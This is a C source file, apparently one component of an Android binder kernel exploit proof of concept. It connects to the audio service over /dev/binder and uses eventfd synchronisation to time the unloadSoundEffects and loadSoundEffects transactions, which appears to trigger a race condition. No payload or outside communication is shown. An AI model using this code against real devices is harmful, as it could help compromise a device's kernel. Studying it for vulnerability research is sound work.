#include "common.h"
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <unistd.h>

#include "binder.h"

static struct binder_state *bs;

static uint32_t lookup_audio(struct binder_state* bs) {
  struct binder_io msg;
  struct binder_io reply;
  char data[0x1000];
  uint32_t handle = 0;

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.os.IServiceManager");
  bio_put_string16_x(&msg, "audio");
  binder_call(bs, &msg, &reply, 0, 1, NULL);
  handle = bio_get_ref(&reply);
  binder_acquire(bs, handle);
  binder_done(bs, &msg, &reply);

  return handle;
}

int thread_spawner_main(void) {
  setbuf(stdout, NULL);

  bs = binder_open("/dev/binder", 0x400000);
  if (bs == NULL) err(1, "binder_open");

  uint32_t audio_handle = lookup_audio(bs);
  if (audio_handle == 0) errx(1, "unable to connect to audio service");
  printf("got audio_handle: 0x%x\n", audio_handle);

  // unloadSoundEffects
  {
    struct binder_io msg;
    struct binder_io reply;
    char data[0x1000];
    bio_init(&msg, data, sizeof(data), 4);
    bio_put_uint32(&msg, 0x100); // for setStrictModePolicy()
    bio_put_string16_x(&msg, "android.media.IAudioService");
    if (binder_call(bs, &msg, &reply, audio_handle, 30, NULL)) errx(1, "binder_call");
    binder_done(bs, &msg, &reply);
  }
  printf("thread_spawner ready to transact\n");

  eventfd_inc(SYNC_EFD_A);
  eventfd_dec(SYNC_EFD_D);

  printf("thread_spawner transacting now\n");
  // loadSoundEffects
  {
    struct binder_io msg;
    struct binder_io reply;
    char data[0x1000];
    bio_init(&msg, data, sizeof(data), 4);
    bio_put_uint32(&msg, 0x100); // for setStrictModePolicy()
    bio_put_string16_x(&msg, "android.media.IAudioService");
    if (binder_call(bs, &msg, &reply, audio_handle, 29, NULL)) errx(1, "binder_call");
    binder_done(bs, &msg, &reply);
  }

  return 0;
}
